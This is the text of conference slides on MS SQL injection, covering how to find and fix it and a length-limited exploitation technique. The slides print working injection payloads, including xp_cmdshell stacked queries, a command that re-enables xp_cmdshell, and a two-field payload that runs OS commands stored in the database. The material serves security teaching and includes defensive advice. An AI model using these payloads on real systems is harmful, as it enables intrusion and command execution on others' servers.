[In]Seguridad Informática_ [SQLMAP] SQL Injection utilizando método POST
The Greatest SQL Injection Ever Told · -SQLMap is not infallible-Use parameterized queries when...
Transcript of The Greatest SQL Injection Ever Told · -SQLMap is not infallible-Use parameterized queries when...
![Page 1: The Greatest SQL Injection Ever Told · -SQLMap is not infallible-Use parameterized queries when possible-Validate input on dynamic SQL-When in doubt, lab it out-People can (and do)](https://reader030.fdocuments.us/reader030/viewer/2022040213/5e9e9ab4e42f2003c9601e4b/html5/thumbnails/1.jpg)
BE
INF
OR
ME
D.
BE
STR
ATE
GIC
.B
E S
EC
UR
E.
The Greatest SQL Injection Ever Told
Stephen Deck, GSE, OSCE, CISSP
@ranger_cha
BE
INF
OR
ME
D.
BE
STR
ATE
GIC
.B
E S
EC
UR
E.
![Page 2: The Greatest SQL Injection Ever Told · -SQLMap is not infallible-Use parameterized queries when possible-Validate input on dynamic SQL-When in doubt, lab it out-People can (and do)](https://reader030.fdocuments.us/reader030/viewer/2022040213/5e9e9ab4e42f2003c9601e4b/html5/thumbnails/2.jpg)
OVERVIEW
-What is SQLi?
-Finding SQLi
-Fixing SQLi
-Basic SQLi exploitation
-Advanced SQLi exploitation
-Only covering MS SQL
2
![Page 3: The Greatest SQL Injection Ever Told · -SQLMap is not infallible-Use parameterized queries when possible-Validate input on dynamic SQL-When in doubt, lab it out-People can (and do)](https://reader030.fdocuments.us/reader030/viewer/2022040213/5e9e9ab4e42f2003c9601e4b/html5/thumbnails/3.jpg)
SQLi OVERVIEW
-SQL Injection
-Attacker provides text that is interpreted as SQL
-Most often on in-line SQL (boring)
-Sometimes on stored procedure and parameterized queries
-Look for “dynamic SQL” for interesting SQLi
-SELECT, INSERT, UPDATE, DELETE are all susceptible
3
![Page 4: The Greatest SQL Injection Ever Told · -SQLMap is not infallible-Use parameterized queries when possible-Validate input on dynamic SQL-When in doubt, lab it out-People can (and do)](https://reader030.fdocuments.us/reader030/viewer/2022040213/5e9e9ab4e42f2003c9601e4b/html5/thumbnails/4.jpg)
STATIC SQL QUERY
-SELECT COLUMN FROM TABLE WHERE
COLUMN LIKE ‘%INPUT%’;
-SELECT ID FROM USERS WHERE USERNAME =
‘INPUT’ AND PASSWORD=‘INPUT’;
-User input in the where clause, can’t control column
names
4
![Page 5: The Greatest SQL Injection Ever Told · -SQLMap is not infallible-Use parameterized queries when possible-Validate input on dynamic SQL-When in doubt, lab it out-People can (and do)](https://reader030.fdocuments.us/reader030/viewer/2022040213/5e9e9ab4e42f2003c9601e4b/html5/thumbnails/5.jpg)
DYNAMIC SQL
-Create SQL based on user input
-Columns
-Tables
-Filters in where clause
-Common on advanced search pages
5
![Page 6: The Greatest SQL Injection Ever Told · -SQLMap is not infallible-Use parameterized queries when possible-Validate input on dynamic SQL-When in doubt, lab it out-People can (and do)](https://reader030.fdocuments.us/reader030/viewer/2022040213/5e9e9ab4e42f2003c9601e4b/html5/thumbnails/6.jpg)
EXAMPLE SEARCH PAGE
6
![Page 7: The Greatest SQL Injection Ever Told · -SQLMap is not infallible-Use parameterized queries when possible-Validate input on dynamic SQL-When in doubt, lab it out-People can (and do)](https://reader030.fdocuments.us/reader030/viewer/2022040213/5e9e9ab4e42f2003c9601e4b/html5/thumbnails/7.jpg)
DYNAMIC SQL
7
![Page 8: The Greatest SQL Injection Ever Told · -SQLMap is not infallible-Use parameterized queries when possible-Validate input on dynamic SQL-When in doubt, lab it out-People can (and do)](https://reader030.fdocuments.us/reader030/viewer/2022040213/5e9e9ab4e42f2003c9601e4b/html5/thumbnails/8.jpg)
TYPES OF SQL INJECTION
-Normal – see results
-Stacked Queries – ‘; exec xp_cmdshell ‘dir’
-Union-based – ‘ UNION select column1 from table2;--
-Inferential / Blind – cannot see query results
-Boolean-based – ‘ or column1 like ‘%a%’;--
-Time-based – ‘; WAIT FOR DELAY ‘00:00:05’;--
-Error-based – ’ and 1=db_name();--8
![Page 9: The Greatest SQL Injection Ever Told · -SQLMap is not infallible-Use parameterized queries when possible-Validate input on dynamic SQL-When in doubt, lab it out-People can (and do)](https://reader030.fdocuments.us/reader030/viewer/2022040213/5e9e9ab4e42f2003c9601e4b/html5/thumbnails/9.jpg)
IN-LINE SQL
9
-Database query in app code
-Often vulnerable to SQLi
-Have to rely on regex validation or whitelisting for
safety
-Never a good idea
-Infinite length for exploitation
![Page 10: The Greatest SQL Injection Ever Told · -SQLMap is not infallible-Use parameterized queries when possible-Validate input on dynamic SQL-When in doubt, lab it out-People can (and do)](https://reader030.fdocuments.us/reader030/viewer/2022040213/5e9e9ab4e42f2003c9601e4b/html5/thumbnails/10.jpg)
DANGEROUS IN-LINE SQL
10
![Page 11: The Greatest SQL Injection Ever Told · -SQLMap is not infallible-Use parameterized queries when possible-Validate input on dynamic SQL-When in doubt, lab it out-People can (and do)](https://reader030.fdocuments.us/reader030/viewer/2022040213/5e9e9ab4e42f2003c9601e4b/html5/thumbnails/11.jpg)
SAFE IN-LINE SQL
11
![Page 12: The Greatest SQL Injection Ever Told · -SQLMap is not infallible-Use parameterized queries when possible-Validate input on dynamic SQL-When in doubt, lab it out-People can (and do)](https://reader030.fdocuments.us/reader030/viewer/2022040213/5e9e9ab4e42f2003c9601e4b/html5/thumbnails/12.jpg)
STORED PROCEDURE
12
-Clean separation between SQL and user input
-SQL statement stored in database
-Still may be used to create dynamic SQL
-Watch for parameters like WHERE, COLUMN, or TABLE
-Limited length for exploitation
![Page 13: The Greatest SQL Injection Ever Told · -SQLMap is not infallible-Use parameterized queries when possible-Validate input on dynamic SQL-When in doubt, lab it out-People can (and do)](https://reader030.fdocuments.us/reader030/viewer/2022040213/5e9e9ab4e42f2003c9601e4b/html5/thumbnails/13.jpg)
DANGEROUS STORED PROCEDURE
13
![Page 14: The Greatest SQL Injection Ever Told · -SQLMap is not infallible-Use parameterized queries when possible-Validate input on dynamic SQL-When in doubt, lab it out-People can (and do)](https://reader030.fdocuments.us/reader030/viewer/2022040213/5e9e9ab4e42f2003c9601e4b/html5/thumbnails/14.jpg)
SAFE STORED PROCEDURE
14
![Page 15: The Greatest SQL Injection Ever Told · -SQLMap is not infallible-Use parameterized queries when possible-Validate input on dynamic SQL-When in doubt, lab it out-People can (and do)](https://reader030.fdocuments.us/reader030/viewer/2022040213/5e9e9ab4e42f2003c9601e4b/html5/thumbnails/15.jpg)
PARAMETERIZED QUERY
15
-All arguments passed as parameters
-Database can understand user data vs SQL
code
-Usually safe (you can still screw it up)
-Watch for user data not passed as a parameter
![Page 16: The Greatest SQL Injection Ever Told · -SQLMap is not infallible-Use parameterized queries when possible-Validate input on dynamic SQL-When in doubt, lab it out-People can (and do)](https://reader030.fdocuments.us/reader030/viewer/2022040213/5e9e9ab4e42f2003c9601e4b/html5/thumbnails/16.jpg)
SAFE PARAMETERIZED QUERY
16
-All user data must be in a parameter
![Page 17: The Greatest SQL Injection Ever Told · -SQLMap is not infallible-Use parameterized queries when possible-Validate input on dynamic SQL-When in doubt, lab it out-People can (and do)](https://reader030.fdocuments.us/reader030/viewer/2022040213/5e9e9ab4e42f2003c9601e4b/html5/thumbnails/17.jpg)
DANGEROUS PARAMETERIZED QUERY
17
![Page 18: The Greatest SQL Injection Ever Told · -SQLMap is not infallible-Use parameterized queries when possible-Validate input on dynamic SQL-When in doubt, lab it out-People can (and do)](https://reader030.fdocuments.us/reader030/viewer/2022040213/5e9e9ab4e42f2003c9601e4b/html5/thumbnails/18.jpg)
FINDING THE SQL INJECTION – NORMAL RESPONSE
18
![Page 19: The Greatest SQL Injection Ever Told · -SQLMap is not infallible-Use parameterized queries when possible-Validate input on dynamic SQL-When in doubt, lab it out-People can (and do)](https://reader030.fdocuments.us/reader030/viewer/2022040213/5e9e9ab4e42f2003c9601e4b/html5/thumbnails/19.jpg)
FINDING THE SQL INJECTION – BAD RESPONSE
19
![Page 20: The Greatest SQL Injection Ever Told · -SQLMap is not infallible-Use parameterized queries when possible-Validate input on dynamic SQL-When in doubt, lab it out-People can (and do)](https://reader030.fdocuments.us/reader030/viewer/2022040213/5e9e9ab4e42f2003c9601e4b/html5/thumbnails/20.jpg)
FINDING THE SQL INJECTION – BAD RESPONSE
20
![Page 21: The Greatest SQL Injection Ever Told · -SQLMap is not infallible-Use parameterized queries when possible-Validate input on dynamic SQL-When in doubt, lab it out-People can (and do)](https://reader030.fdocuments.us/reader030/viewer/2022040213/5e9e9ab4e42f2003c9601e4b/html5/thumbnails/21.jpg)
FINDING THE SQL INJECTION – BAD RESPONSE
21
![Page 22: The Greatest SQL Injection Ever Told · -SQLMap is not infallible-Use parameterized queries when possible-Validate input on dynamic SQL-When in doubt, lab it out-People can (and do)](https://reader030.fdocuments.us/reader030/viewer/2022040213/5e9e9ab4e42f2003c9601e4b/html5/thumbnails/22.jpg)
FINDING THE SQL INJECTION – BAD RESPONSE
22
![Page 23: The Greatest SQL Injection Ever Told · -SQLMap is not infallible-Use parameterized queries when possible-Validate input on dynamic SQL-When in doubt, lab it out-People can (and do)](https://reader030.fdocuments.us/reader030/viewer/2022040213/5e9e9ab4e42f2003c9601e4b/html5/thumbnails/23.jpg)
WHAT IS HAPPENING?
23
-Select * from test.dbo.users where lastName like ‘%e%’
-Give me all entries from the users table where the last
name has an ‘e’ in it
-Select * from test.dbo.users where lastName like ‘%’ or
1=1;--%’
-Give me all entries from the users table where the last
name is anything or when 1=1 (always true)
![Page 24: The Greatest SQL Injection Ever Told · -SQLMap is not infallible-Use parameterized queries when possible-Validate input on dynamic SQL-When in doubt, lab it out-People can (and do)](https://reader030.fdocuments.us/reader030/viewer/2022040213/5e9e9ab4e42f2003c9601e4b/html5/thumbnails/24.jpg)
STACKED QUERIES
24
-Use stacked queries
-Multiple queries in one request
- ; to separate queries
-Not always supported
-MS-SQL does support it
-MySQL usually no
-Oracle does not
![Page 25: The Greatest SQL Injection Ever Told · -SQLMap is not infallible-Use parameterized queries when possible-Validate input on dynamic SQL-When in doubt, lab it out-People can (and do)](https://reader030.fdocuments.us/reader030/viewer/2022040213/5e9e9ab4e42f2003c9601e4b/html5/thumbnails/25.jpg)
CODE EXECUTION
25
-MS-SQL has xp_cmdshell
-Should not be enabled (but still gets turned on)
-We *MIGHT* need it!
-Can re-enable it if the database user is an admin
-EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE
-Others need a user-defined function
![Page 26: The Greatest SQL Injection Ever Told · -SQLMap is not infallible-Use parameterized queries when possible-Validate input on dynamic SQL-When in doubt, lab it out-People can (and do)](https://reader030.fdocuments.us/reader030/viewer/2022040213/5e9e9ab4e42f2003c9601e4b/html5/thumbnails/26.jpg)
XP_CMDSHELL – NORMAL COMMAND
26
-Select * from test.dbo.users where lastName like ‘%’;
exec xp_cmdshell 'ping 127.0.0.1';--%’
-Select all entries from the users table with a last name
with any characters.
-Then, run the operating system command to ping
localhost
![Page 27: The Greatest SQL Injection Ever Told · -SQLMap is not infallible-Use parameterized queries when possible-Validate input on dynamic SQL-When in doubt, lab it out-People can (and do)](https://reader030.fdocuments.us/reader030/viewer/2022040213/5e9e9ab4e42f2003c9601e4b/html5/thumbnails/27.jpg)
XP_CMDSHELL – NORMAL COMMAND
27
![Page 28: The Greatest SQL Injection Ever Told · -SQLMap is not infallible-Use parameterized queries when possible-Validate input on dynamic SQL-When in doubt, lab it out-People can (and do)](https://reader030.fdocuments.us/reader030/viewer/2022040213/5e9e9ab4e42f2003c9601e4b/html5/thumbnails/28.jpg)
AWKWARD EXPLOITATION
28
-Length limited to 50 chars for first name and last name
-12 for SSN
-Have to use ‘’ for each ‘
-Cannot split some strings with /* */
-xp_cmdshell arg
-Reserved words
![Page 29: The Greatest SQL Injection Ever Told · -SQLMap is not infallible-Use parameterized queries when possible-Validate input on dynamic SQL-When in doubt, lab it out-People can (and do)](https://reader030.fdocuments.us/reader030/viewer/2022040213/5e9e9ab4e42f2003c9601e4b/html5/thumbnails/29.jpg)
XP_CMDSHELL – ADD DOMAIN USER
29
![Page 30: The Greatest SQL Injection Ever Told · -SQLMap is not infallible-Use parameterized queries when possible-Validate input on dynamic SQL-When in doubt, lab it out-People can (and do)](https://reader030.fdocuments.us/reader030/viewer/2022040213/5e9e9ab4e42f2003c9601e4b/html5/thumbnails/30.jpg)
SQLMAP – FAIL
30
![Page 31: The Greatest SQL Injection Ever Told · -SQLMap is not infallible-Use parameterized queries when possible-Validate input on dynamic SQL-When in doubt, lab it out-People can (and do)](https://reader030.fdocuments.us/reader030/viewer/2022040213/5e9e9ab4e42f2003c9601e4b/html5/thumbnails/31.jpg)
XP_CMDSHELL – ADD DOMAIN USER
31
-No account created
![Page 32: The Greatest SQL Injection Ever Told · -SQLMap is not infallible-Use parameterized queries when possible-Validate input on dynamic SQL-When in doubt, lab it out-People can (and do)](https://reader030.fdocuments.us/reader030/viewer/2022040213/5e9e9ab4e42f2003c9601e4b/html5/thumbnails/32.jpg)
AWKWARD EXPLOITATION
32
-Our add account string was 59 characters
-Found upper length limit with trial and error
- ‘ or ‘AAAAA’ = ‘AAAAA’;-- until we get errors
-Could cut down on command length, but unlimited is
nice
-Hard to get files from the internet on Windows
![Page 33: The Greatest SQL Injection Ever Told · -SQLMap is not infallible-Use parameterized queries when possible-Validate input on dynamic SQL-When in doubt, lab it out-People can (and do)](https://reader030.fdocuments.us/reader030/viewer/2022040213/5e9e9ab4e42f2003c9601e4b/html5/thumbnails/33.jpg)
OS COMMAND AS VARIABLE
33
-Variable won’t persist, still limited length
-Not all fields are limited length in most
databases
-Find a text field where you can store data and
put OS command in it
-Notes, comments, etc.
![Page 34: The Greatest SQL Injection Ever Told · -SQLMap is not infallible-Use parameterized queries when possible-Validate input on dynamic SQL-When in doubt, lab it out-People can (and do)](https://reader030.fdocuments.us/reader030/viewer/2022040213/5e9e9ab4e42f2003c9601e4b/html5/thumbnails/34.jpg)
OS COMMAND AS VARIABLE
34
![Page 35: The Greatest SQL Injection Ever Told · -SQLMap is not infallible-Use parameterized queries when possible-Validate input on dynamic SQL-When in doubt, lab it out-People can (and do)](https://reader030.fdocuments.us/reader030/viewer/2022040213/5e9e9ab4e42f2003c9601e4b/html5/thumbnails/35.jpg)
OS COMMAND AS VARIABLE
35
-Need enough length to read variable out of the
database
-declare @a VARCHAR(999);
-select @a = text from notes where noteId = 3;
-exec xp_cmdshell @a;--
![Page 36: The Greatest SQL Injection Ever Told · -SQLMap is not infallible-Use parameterized queries when possible-Validate input on dynamic SQL-When in doubt, lab it out-People can (and do)](https://reader030.fdocuments.us/reader030/viewer/2022040213/5e9e9ab4e42f2003c9601e4b/html5/thumbnails/36.jpg)
FINAL PAYLOAD
36
-First Name (50 chars)
-'; declare @a VARCHAR(999);select @a =
text from/*
-Last Name (46 chars)
-*/ notes where noteId=3;exec xp_cmdshell
@a;--
![Page 37: The Greatest SQL Injection Ever Told · -SQLMap is not infallible-Use parameterized queries when possible-Validate input on dynamic SQL-When in doubt, lab it out-People can (and do)](https://reader030.fdocuments.us/reader030/viewer/2022040213/5e9e9ab4e42f2003c9601e4b/html5/thumbnails/37.jpg)
EXECUTE OS COMMAND
37
![Page 38: The Greatest SQL Injection Ever Told · -SQLMap is not infallible-Use parameterized queries when possible-Validate input on dynamic SQL-When in doubt, lab it out-People can (and do)](https://reader030.fdocuments.us/reader030/viewer/2022040213/5e9e9ab4e42f2003c9601e4b/html5/thumbnails/38.jpg)
EXECUTE OS COMMAND
38
![Page 39: The Greatest SQL Injection Ever Told · -SQLMap is not infallible-Use parameterized queries when possible-Validate input on dynamic SQL-When in doubt, lab it out-People can (and do)](https://reader030.fdocuments.us/reader030/viewer/2022040213/5e9e9ab4e42f2003c9601e4b/html5/thumbnails/39.jpg)
WHY IS THIS COOL?
39
-Limited Length
-Sqlmap won’t work
-Use /* */ to bridge fields
-Kind of an egg-hunterish feel
-Avoids strings you can’t break
-Uses SQL programming info
![Page 40: The Greatest SQL Injection Ever Told · -SQLMap is not infallible-Use parameterized queries when possible-Validate input on dynamic SQL-When in doubt, lab it out-People can (and do)](https://reader030.fdocuments.us/reader030/viewer/2022040213/5e9e9ab4e42f2003c9601e4b/html5/thumbnails/40.jpg)
SUMMARY
-SQL injection is when an attacker “completes” a SQL query with their own code
-SQLMap is not infallible
-Use parameterized queries when possible
-Validate input on dynamic SQL
-When in doubt, lab it out
-People can (and do) screw up stored procedures and parameterized queries
40
![Page 41: The Greatest SQL Injection Ever Told · -SQLMap is not infallible-Use parameterized queries when possible-Validate input on dynamic SQL-When in doubt, lab it out-People can (and do)](https://reader030.fdocuments.us/reader030/viewer/2022040213/5e9e9ab4e42f2003c9601e4b/html5/thumbnails/41.jpg)
www.directdefense.comwww.directdefense.com